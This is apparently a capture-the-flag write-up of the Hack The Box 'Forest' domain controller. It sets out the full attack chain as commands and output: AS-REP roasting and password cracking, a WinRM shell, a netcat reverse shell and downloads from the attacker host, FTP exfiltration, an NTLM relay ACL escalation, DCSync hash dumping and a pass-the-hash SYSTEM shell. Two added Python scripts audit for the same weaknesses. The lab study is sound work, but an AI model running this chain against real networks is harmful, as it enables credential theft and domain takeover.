As usual, I start with a full TCP nmap scan:
root@kalivm:~/Forest# nmap -sTV -p 1-65535 -oN fullscan_tcp 10.10.10.161
Starting Nmap 7.80 (https://nmap.org ) at 2020-01-06 11:47 CET
Nmap scan report for 10.10.10.161
Host is up (0.016s latency).
Not shown: 65511 closed ports
PORT STATE SERVICE VERSION
53/tcp open domain?
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2019-10-21 09:54:20Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds (workgroup: HTB)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49671/tcp open msrpc Microsoft Windows RPC
49674/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49675/tcp open msrpc Microsoft Windows RPC
49682/tcp open msrpc Microsoft Windows RPC
49701/tcp open msrpc Microsoft Windows RPC
49913/tcp open msrpc Microsoft Windows RPC
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 159.67 seconds
There are already several interesting things in this result. First of all, this is a domain-joined system in the HTB.local domain. It exposes Kerberos, LDAP and SMB to the outside world and looks like a domain controller. And last but not least, a WinRM port (5985) is open. This could be an attack similar to the approach I took a long time ago for the ‘Active’ machine on Hackthebox, combined with the WinRM attack on Heist!
First, let’s try enum4linux to see if I can gather some more information.
root@kalivm:~/Forest# enum4linux -a 10.10.10.161
Starting enum4linux v0.8.9
==========================
| Target Information |
==========================
Target ........... 10.10.10.161
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
---snip---
===========================================
| Getting domain SID for 10.10.10.161 |
===========================================
Domain Name: HTB
Domain Sid: S-1-5-21-3072663084-364016917-1341370565
[+] Host is part of a domain (not a workgroup)
---snip---
=============================
| Users on 10.10.10.161 |
=============================
---snip---
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[$331000-VK4ADACQNUCA] rid:[0x463]
user:[SM_2c8eef0a09b545acb] rid:[0x464]
user:[SM_ca8c2ed5bdab4dc9b] rid:[0x465]
user:[SM_75a538d3025e4db9a] rid:[0x466]
user:[SM_681f53d4942840e18] rid:[0x467]
user:[SM_1b41c9286325456bb] rid:[0x468]
user:[SM_9b69f1b9d2cc45549] rid:[0x469]
user:[SM_7c96b981967141ebb] rid:[0x46a]
user:[SM_c75ee099d0a64c91b] rid:[0x46b]
user:[SM_1ffab36a2f5f479cb] rid:[0x46c]
user:[HealthMailboxc3d7722] rid:[0x46e]
user:[HealthMailboxfc9daad] rid:[0x46f]
user:[HealthMailboxc0a90c9] rid:[0x470]
user:[HealthMailbox670628e] rid:[0x471]
user:[HealthMailbox968e74d] rid:[0x472]
user:[HealthMailbox6ded678] rid:[0x473]
user:[HealthMailbox83d6781] rid:[0x474]
user:[HealthMailboxfd87238] rid:[0x475]
user:[HealthMailboxb01ac64] rid:[0x476]
user:[HealthMailbox7108a4e] rid:[0x477]
user:[HealthMailbox0659cc1] rid:[0x478]
user:[sebastien] rid:[0x479]
user:[lucinda] rid:[0x47a]
user:[svc-alfresco] rid:[0x47b]
user:[andy] rid:[0x47e]
user:[mark] rid:[0x47f]
user:[santi] rid:[0x480]
---snip---
====================================================
| Password Policy Information for 10.10.10.161 |
====================================================
[+] Attaching to 10.10.10.161 using a NULL share
[+] Trying protocol 445/SMB...
[+] Found domain(s):
[+] HTB
[+] Builtin
[+] Password Info for Domain: HTB
[+] Minimum password length: 7
[+] Password history length: 24
[+] Maximum password age: 41 days 23 hours 53 minutes
[+] Password Complexity Flags: 000000
[+] Domain Refuse Password Change: 0
[+] Domain Password Store Cleartext: 0
[+] Domain Password Lockout Admins: 0
[+] Domain Password No Clear Change: 0
[+] Domain Password No Anon Change: 0
[+] Domain Password Complex: 0
[+] Minimum password age: 1 day 4 minutes
[+] Reset Account Lockout Counter: 30 minutes
[+] Locked Account Duration: 30 minutes
[+] Account Lockout Threshold: None
[+] Forced Log off Time: Not Set
[+] Retieved partial password policy with rpcclient:
Password Complexity: Disabled
Minimum Password Length: 7
---snip---
==============================
| Groups on 10.10.10.161 |
==============================
---snip---
[+] Getting domain groups:
group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]
group:[Domain Admins] rid:[0x200]
group:[Domain Users] rid:[0x201]
group:[Domain Guests] rid:[0x202]
group:[Domain Computers] rid:[0x203]
group:[Domain Controllers] rid:[0x204]
group:[Schema Admins] rid:[0x206]
group:[Enterprise Admins] rid:[0x207]
group:[Group Policy Creator Owners] rid:[0x208]
group:[Read-only Domain Controllers] rid:[0x209]
group:[Cloneable Domain Controllers] rid:[0x20a]
group:[Protected Users] rid:[0x20d]
group:[Key Admins] rid:[0x20e]
group:[Enterprise Key Admins] rid:[0x20f]
group:[DnsUpdateProxy] rid:[0x44e]
group:[Organization Management] rid:[0x450]
group:[Recipient Management] rid:[0x451]
group:[View-Only Organization Management] rid:[0x452]
group:[Public Folder Management] rid:[0x453]
group:[UM Management] rid:[0x454]
group:[Help Desk] rid:[0x455]
group:[Records Management] rid:[0x456]
group:[Discovery Management] rid:[0x457]
group:[Server Management] rid:[0x458]
group:[Delegated Setup] rid:[0x459]
group:[Hygiene Management] rid:[0x45a]
group:[Compliance Management] rid:[0x45b]
group:[Security Reader] rid:[0x45c]
group:[Security Administrator] rid:[0x45d]
group:[Exchange Servers] rid:[0x45e]
group:[Exchange Trusted Subsystem] rid:[0x45f]
group:[Managed Availability Servers] rid:[0x460]
group:[Exchange Windows Permissions] rid:[0x461]
group:[ExchangeLegacyInterop] rid:[0x462]
group:[$D31000-NSEL5BRJ63V7] rid:[0x46d]
group:[Service Accounts] rid:[0x47c]
group:[Privileged IT Accounts] rid:[0x47d]
group:[test] rid:[0x13ed]
[+] Getting domain group memberships:
Group 'Enterprise Admins' (RID: 519) has member: HTB\Administrator
Group 'Privileged IT Accounts' (RID: 1149) has member: HTB\Service Accounts
Group 'Service Accounts' (RID: 1148) has member: HTB\svc-alfresco
Group 'Domain Controllers' (RID: 516) has member: HTB\FOREST$
Group 'Exchange Trusted Subsystem' (RID: 1119) has member: HTB\EXCH01$
---snip---
enum4linux complete on Mon Oct 21 12:05:29 2019
Enum4linux reveals many interesting things. First of all, I see that there are some regular users (sebastien, lucinda, andy, mark, santi) present and a clear service account (svc-alfresco).
Furthermore, no password complexity is enforced and the account lockout threshold is ‘None’, which can mean easy to guess / crack passwords. There also seems to be a Microsoft Exchange installation present, which is commonly known as a major security risk if not properly configured! And the last lines confirm the suspicion: Forest is actually a member of the Domain Controllers group! So I started browsing the impacket tools and trying several until I got to the GetNPUsers.py tool.
root@kalivm:~/Forest# GetNPUsers.py -dc-ip 10.10.10.161 -no-pass HTB/sebastien
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation
[*] Getting TGT for sebastien
[-] User sebastien doesn't have UF_DONT_REQUIRE_PREAUTH set
root@kalivm:~/Forest# GetNPUsers.py -dc-ip 10.10.10.161 -no-pass HTB/lucinda
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation
[*] Getting TGT for lucinda
[-] User lucinda doesn't have UF_DONT_REQUIRE_PREAUTH set
root@kalivm:~/Forest# GetNPUsers.py -dc-ip 10.10.10.161 -no-pass HTB/svc-alfresco
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation
[*] Getting TGT for svc-alfresco
$krb5asrep$23$svc-alfresco@HTB:38ca5d56d9fb6fd3c11015cecd122482$e6e0c606ccf778924c3e4dc02f63f3bfeae8c4b67ea08044268db8bde81aa007fb921555847d786b92084b72f6a2ac83d8843b33c5005e768208a7ede2e37663ce6891e080b45a11b361d0b5979e2eb9bf885f8e983ed21b4891559301dc693fc71d3eb2e7d8ec2b77b5668ec23ca4599bfddd3d9163325231d1933f50637cc8af4eba5f351dd703c91c2ded255ebec3d3629bbd0949ae1d5df267010acd0289440e255abe7955ce2c5658dd8ef83cc0eaccd84a1b293334edad0398cf78247cc275aaae85bba3f42f3de757ab726547d401f06cda2b8af5f9200d8f95f7001e
After trying it for several users, I finally got an AS-REP for the user svc-alfresco (the only one of these accounts that doesn’t require Kerberos pre-authentication), which I could try cracking with hashcat.
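The flag GetNPUsers.py tests for is the UF_DONT_REQUIRE_PREAUTH bit (0x400000) of the userAccountControl attribute. As an added defender-side check, not part of the original writeup, this script decodes that attribute from a constructed LDIF export and lists the enabled accounts that are exposed to exactly this roasting attempt; the LDIF sample and the UF_* names are assumptions, the bit values are the documented ones.

```python
# Bits of the userAccountControl attribute (UF_* constants from the Windows SDK)
UF_ACCOUNTDISABLE = 0x0002
UF_NORMAL_ACCOUNT = 0x0200
UF_DONT_EXPIRE_PASSWD = 0x10000
UF_DONT_REQUIRE_PREAUTH = 0x400000

FLAG_NAMES = {
    UF_ACCOUNTDISABLE: "ACCOUNTDISABLE",
    UF_NORMAL_ACCOUNT: "NORMAL_ACCOUNT",
    UF_DONT_EXPIRE_PASSWD: "DONT_EXPIRE_PASSWD",
    UF_DONT_REQUIRE_PREAUTH: "DONT_REQUIRE_PREAUTH",
}

def decode_uac(value):
    """Name the known flags set in a userAccountControl value."""
    return [name for bit, name in FLAG_NAMES.items() if value & bit]

def parse_ldif(text):
    """Parse a minimal LDIF dump: one 'attr: value' per line, blank line between entries."""
    entries, current = [], {}
    for line in text.splitlines():
        if not line.strip():
            if current:
                entries.append(current)
                current = {}
            continue
        attr, _, value = line.partition(": ")
        current[attr] = value
    if current:
        entries.append(current)
    return entries

def asrep_exposed(entries):
    """sAMAccountNames of enabled users with Kerberos pre-authentication disabled."""
    exposed = []
    for entry in entries:
        uac = int(entry.get("userAccountControl", "0"))
        if uac & UF_DONT_REQUIRE_PREAUTH and not uac & UF_ACCOUNTDISABLE:
            exposed.append(entry["sAMAccountName"])
    return exposed

# Constructed LDIF export; the values mirror what the three GetNPUsers.py runs above imply.
# 4260352 = 0x410200 = NORMAL_ACCOUNT | DONT_EXPIRE_PASSWD | DONT_REQUIRE_PREAUTH
# 4194818 = 0x400202 = the same bit, but on a disabled account (not exposed)
SAMPLE_LDIF = """\
dn: CN=sebastien,CN=Users,DC=htb,DC=local
sAMAccountName: sebastien
userAccountControl: 512

dn: CN=lucinda,CN=Users,DC=htb,DC=local
sAMAccountName: lucinda
userAccountControl: 512

dn: CN=svc-alfresco,CN=Users,DC=htb,DC=local
sAMAccountName: svc-alfresco
userAccountControl: 4260352

dn: CN=old-svc,CN=Users,DC=htb,DC=local
sAMAccountName: old-svc
userAccountControl: 4194818
"""
```

Running `asrep_exposed(parse_ldif(SAMPLE_LDIF))` on the sample returns only svc-alfresco, which is the account the AS-REP above belongs to.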
[hashcat] $ hashcat -m 18200 -a 0 -w 3 forest.hash rockyou.txt
---snip---
Dictionary cache hit:
* Filename..: rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
$krb5asrep$23$svc-alfresco@HTB:38ca5d56d9fb6fd3c11015cecd122482$e6e0c606ccf778924c3e4dc02f63f3bfeae8c4b67ea08044268db8bde81aa007fb921555847d786b92084b72f6a2ac83d8843b33c5005e768208a7ede2e37663ce6891e080b45a11b361d0b5979e2eb9bf885f8e983ed21b4891559301dc693fc71d3eb2e7d8ec2b77b5668ec23ca4599bfddd3d9163325231d1933f50637cc8af4eba5f351dd703c91c2ded255ebec3d3629bbd0949ae1d5df267010acd0289440e255abe7955ce2c5658dd8ef83cc0eaccd84a1b293334edad0398cf78247cc275aaae85bba3f42f3de757ab726547d401f06cda2b8af5f9200d8f95f7001e:s3rvice
Session..........: hashcat
Status...........: Cracked
Hash.Type........: Kerberos 5 AS-REP etype 23
Hash.Target......: $krb5asrep$23$svc-alfresco@HTB:a886b951410cd0d9b804...a751ba
Time.Started.....: Fri Oct 25 12:37:07 2019 (1 sec)
Time.Estimated...: Fri Oct 25 12:37:08 2019 (0 secs)
Guess.Base.......: File (rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 13838.5 kH/s (13.64ms) @ Accel:1024 Loops:1 Thr:64 Vec:1
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 4587520/14344385 (31.98%)
Rejected.........: 0/4587520 (0.00%)
Restore.Point....: 3932160/14344385 (27.41%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: seaford123 -> pommiey4632@hotmail.com
Hardware.Mon.#1..: Temp: 41c Fan: 24% Util: 46% Core:1898MHz Mem:3802MHz Bus:16
So apparently svc-alfresco’s password is s3rvice. The next thing I did was tweak the WinRM shell I made earlier for Hackthebox – Heist to include the correct username, password and IP address
require 'winrm'

# Connect to the WinRM endpoint with the recovered credentials
conn = WinRM::Connection.new(
  endpoint: 'http://10.10.10.161:5985/wsman',
  user: 'svc-alfresco',
  password: 's3rvice'
)

command = ''
output = nil
conn.shell(:powershell) do |shell|
  # Read commands from stdin until "exit" is typed (or stdin is closed)
  until command == "exit\n"
    print 'PS > '
    command = gets
    break if command.nil? # EOF on stdin, e.g. CTRL-D
    output = shell.run(command) do |stdout, stderr|
      STDOUT.print stdout
      STDERR.print stderr
    end
  end
  puts "Exiting with code #{output.exitcode}" if output
end
and run it to get shell access.
root@kalivm:~/Forest# ruby shell.rb
PS > whoami
htb\svc-alfresco
All that is left is to grab the user flag and start escalating privileges
PS > type ..\Desktop\user.txt
e5e4*****d9ed
Privilege Escalation
The next step is escalating privileges. After pressing CTRL-C too many times (and losing my WinRM session with it), I decided it was time to set up a simple fallback: a netcat reverse shell.
root@kalivm:~/Forest# ruby shell.rb
PS > mkdir sedje
PS > cd sedje
PS > IWR -uri http://10.10.15.64:8000/nc.exe -outfile nc.exe
PS > ./nc 10.10.15.64 9002 -e powershell.exe
root@kalivm:~/Forest# nc -nvlp 9002
Listening on 0.0.0.0 9002
Connection received on 10.10.10.161 50030
Windows PowerShell
Copyright (C) 2016 Microsoft Corporation. All rights reserved.
PS C:\Users\svc-alfresco\Documents\sedje>
PS C:\Users\svc-alfresco\Documents\sedje> IWR -uri http://10.10.15.64:8000/SharpHound.ps1 -outfile SharpHound.ps1
PS C:\Users\svc-alfresco\Documents\sedje> IWR -uri http://10.10.15.64:8000/SharpHound.exe -outfile SharpHound.exe
PS C:\Users\svc-alfresco\Documents\sedje> Import-Module .\SharpHound.ps1
PS C:\Users\svc-alfresco\Documents\sedje> Invoke-BloodHound -CollectionMethod All -LDAPUser svc-alfresco -LDAPPass s3rvice
PS C:\Users\svc-alfresco\Documents\sedje> dir
Directory: C:\Users\svc-alfresco\Documents\sedje
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 10/25/2019 5:20 AM 12950 20191025120253_BloodHound.zip
-a---- 10/25/2019 5:20 AM 9151 Rk9SRVNU.bin
-a---- 10/25/2019 5:18 AM 751616 SharpHound.exe
-a---- 10/25/2019 5:17 AM 886595 SharpHound.ps1
After the SharpHound script and binary are transferred, I run them as the user svc-alfresco and the collector produces a zip file with all relevant domain data. All that remains is to transfer the file to my local machine and analyze it with BloodHound. The easiest and most used way I learned during my OSCP journey is to create and run a small FTP script.
PS C:\Users\svc-alfresco\Documents\sedje> echo "open 10.10.15.64" > ftp
PS C:\Users\svc-alfresco\Documents\sedje> echo "anonymous" >> ftp
PS C:\Users\svc-alfresco\Documents\sedje> echo "" >> ftp
PS C:\Users\svc-alfresco\Documents\sedje> echo "put 20191101052032_BloodHound.zip" >> ftp
PS C:\Users\svc-alfresco\Documents\sedje> echo "quit" >> ftp
PS C:\Users\svc-alfresco\Documents\sedje> ftp -s:ftp
open 10.10.15.64
Log in with USER and PASS first.
User (10.10.15.64:(none)):
put 20191025120253_BloodHound.zip
quit
Of course, this approach requires an active FTP server on my attacking machine, which is easily done with Python’s pyftpdlib
root@kalivm:~/Forest# python -m pyftpdlib -p 21 -w
/usr/lib/python2.7/dist-packages/pyftpdlib/authorizers.py:244: RuntimeWarning: write permissions assigned to anonymous user.
RuntimeWarning)
[I 2019-10-25 13:15:13] >>> starting FTP server on 0.0.0.0:21, pid=5057 <<<
[I 2019-10-25 13:15:13] concurrency model: async
[I 2019-10-25 13:15:13] masquerade (NAT) address: None
[I 2019-10-25 13:15:13] passive ports: None
[I 2019-10-25 13:15:27] 10.10.10.161:56840-[] FTP session opened (connect)
[I 2019-10-25 13:15:27] 10.10.10.161:56840-[anonymous] USER 'anonymous' logged in.
[I 2019-10-25 13:15:27] 10.10.10.161:56840-[anonymous] STOR /root/Documents/htb/Machines/Forest/20191025120253_BloodHound.zip completed=1 bytes=12950 seconds=0.07
[I 2019-10-25 13:15:27] 10.10.10.161:56840-[anonymous] FTP session closed (disconnect).
Thus the file has been transferred successfully and can be loaded into BloodHound by simply dragging and dropping it onto the interface. Next I load PowerView and create a new domain user, which I add to the ‘Exchange Windows Permissions’ group:
PS C:\Users\svc-alfresco\Documents\sedje> IWR -uri http://10.10.15.64:8000/PowerView.ps1 -outfile Powerview.ps1
PS C:\Users\svc-alfresco\Documents\sedje> Import-Module .\PowerView.ps1
PS C:\Users\svc-alfresco\Documents\sedje> $SecPassword = ConvertTo-SecureString 's3rvice' -AsPlainText -Force
PS C:\Users\svc-alfresco\Documents\sedje> $Cred = New-Object System.Management.Automation.PSCredential('HTB\svc-alfresco', $SecPassword)
PS C:\Users\svc-alfresco\Documents\sedje> New-DomainUser -SamAccountName sedje -AccountPassword $SecPassword -Credential $Cred | Add-DomainGroupMember 'Exchange Windows Permissions' -Credential $Cred
When you add the svc-alfresco account itself to the ‘Exchange Windows Permissions’ group, it is removed again after a few minutes, which is quite a pain. So I decided to add my own user to the domain with the same password as svc-alfresco and add that user to the `Exchange Windows Permissions` group instead. However, after that I was stuck for a long time due to the very specific syntax and switches required (and available) in the impacket tools. If some Discord users had not helped me, I would probably have given up in the end, so I have to thank them for pushing me through the next step!
root@kalivm:~/Forest# ntlmrelayx.py --escalate-user sedje -t ldap://10.10.10.161
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation
[*] Protocol Client SMB loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server
[*] Setting up HTTP Server
[*] Servers started, waiting for connections
Now all I have to do is browse to the local HTTP listener and provide valid credentials; ntlmrelayx will do all the hard work and change the domain permissions for me. I open a browser to localhost and provide the sedje credentials.
[*] HTTPD: Received connection from 127.0.0.1, attacking target ldap://10.10.10.161
[*] HTTPD: Client requested path: /
[*] HTTPD: Client requested path: /
[*] HTTPD: Client requested path: /
[*] Authenticating against ldap://10.10.10.161 as \sedje SUCCEED
[*] Enumerating relayed user's privileges. This may take a while on large domains
[*] User privileges found: Create user
[*] User privileges found: Modifying domain ACL
[*] Querying domain security descriptor
[*] Success! User sedje now has Replication-Get-Changes-All privileges on the domain
[*] Try using DCSync with secretsdump.py and this user :)
[*] Saved restore state to aclpwn-20191025-135738.restoresedsedss
And ntlmrelayx.py already tells me what to do: sedje now has the replication rights needed to run secretsdump.py (DCSync) against the domain controller.
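The two things ntlmrelayx reported, "Modifying domain ACL" for the relayed user and "Replication-Get-Changes-All" afterwards, are exactly what a defender should be auditing on the domain object. As an added example that is not part of the original writeup, this script walks a constructed list of allow ACEs on the domain head and flags principals outside a baseline that can already DCSync or can grant themselves the right via WriteDacl/GenericAll; the ACE layout and the baseline set are assumptions, the extended-right GUIDs are the fixed schema values.

```python
from collections import defaultdict

# Extended-right GUIDs for directory replication (fixed in the AD schema)
GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"      # DS-Replication-Get-Changes
GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"  # DS-Replication-Get-Changes-All
CONTROL_RIGHTS = {"GenericAll", "WriteDacl", "WriteOwner"}

# Constructed baseline of principals expected to hold these rights on the domain head
EXPECTED_TRUSTEES = {
    "HTB\\Domain Controllers",
    "HTB\\Enterprise Read-only Domain Controllers",
    "NT AUTHORITY\\ENTERPRISE DOMAIN CONTROLLERS",
    "BUILTIN\\Administrators",
}

def audit_domain_acl(aces, expected=EXPECTED_TRUSTEES):
    """Return {trustee: [reasons]} for non-baseline principals that can replicate
    directory secrets (DCSync) or can grant themselves the right to do so."""
    held = defaultdict(set)
    for ace in aces:
        if ace["type"] != "Allow":
            continue
        if ace["right"] == "ExtendedRight":
            held[ace["trustee"]].add(ace["object_type"].lower())
        elif ace["right"] in CONTROL_RIGHTS:
            held[ace["trustee"]].add(ace["right"])
    findings = {}
    for trustee, rights in sorted(held.items()):
        if trustee in expected:
            continue
        reasons = []
        if {GET_CHANGES, GET_CHANGES_ALL} <= rights:
            reasons.append("DCSYNC")           # both rights: full secrets replication
        elif rights & {GET_CHANGES, GET_CHANGES_ALL}:
            reasons.append("DCSYNC_PARTIAL")   # only one of the two, still worth review
        for ctl in sorted(rights & CONTROL_RIGHTS):
            reasons.append(f"CAN_GRANT_SELF:{ctl}")  # the 'Modifying domain ACL' path
        if reasons:
            findings[trustee] = reasons
    return findings

# Constructed sample ACL, modelled on the state after the escalation above
SAMPLE_ACES = [
    {"trustee": "HTB\\Domain Controllers", "type": "Allow", "right": "ExtendedRight", "object_type": GET_CHANGES},
    {"trustee": "HTB\\Domain Controllers", "type": "Allow", "right": "ExtendedRight", "object_type": GET_CHANGES_ALL},
    {"trustee": "HTB\\Enterprise Read-only Domain Controllers", "type": "Allow", "right": "ExtendedRight", "object_type": GET_CHANGES},
    {"trustee": "BUILTIN\\Administrators", "type": "Allow", "right": "GenericAll", "object_type": None},
    {"trustee": "HTB\\Exchange Windows Permissions", "type": "Allow", "right": "WriteDacl", "object_type": None},
    {"trustee": "HTB\\sedje", "type": "Allow", "right": "ExtendedRight", "object_type": GET_CHANGES},
    {"trustee": "HTB\\sedje", "type": "Allow", "right": "ExtendedRight", "object_type": GET_CHANGES_ALL},
    {"trustee": "HTB\\svc-alfresco", "type": "Deny", "right": "ExtendedRight", "object_type": GET_CHANGES_ALL},
]

if __name__ == "__main__":
    for trustee, reasons in audit_domain_acl(SAMPLE_ACES).items():
        print(f"{trustee}: {', '.join(reasons)}")
```

On the sample this reports sedje as able to DCSync and Exchange Windows Permissions as able to grant itself the right, while the baseline replication holders and the deny ACE stay silent.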
root@kalivm:~/Forest# secretsdump.py htb/sedje:s3rvice@10.10.10.161
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:819af826bb148e603acb0f33d17632f8:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\$331000-VK4ADACQNUCA:1123:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
---snip---
secretsdump.py returns the hashes of every account in the domain. With the Administrator NT hash, psexec.py gives a pass-the-hash SYSTEM shell:
root@kalivm:~/Forest# psexec.py -hashes :32693b11e6aa90eb43d32c72a07ceea6 htb/administrator@10.10.10.161 powershell.exe
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation
[*] Requesting shares on 10.10.10.161.....
[*] Found writable share ADMIN$
[*] Uploading file ezaVoayr.exe
[*] Opening SVCManager on 10.10.10.161.....
[*] Creating service CAke on 10.10.10.161.....
[*] Starting service CAke.....
[!] Press help for extra shell commands
Windows PowerShell
Copyright (C) 2016 Microsoft Corporation. All rights reserved.
PS C:\Windows\system32> whoami
whoami
nt authority\system
PS C:\Windows\system32> type c:\Users\Administrator\Desktop\root.txt
type c:\Users\Administrator\Desktop\root.txt
f048153f202bbb2f82622b04d79129cc
Author: Puckiestyle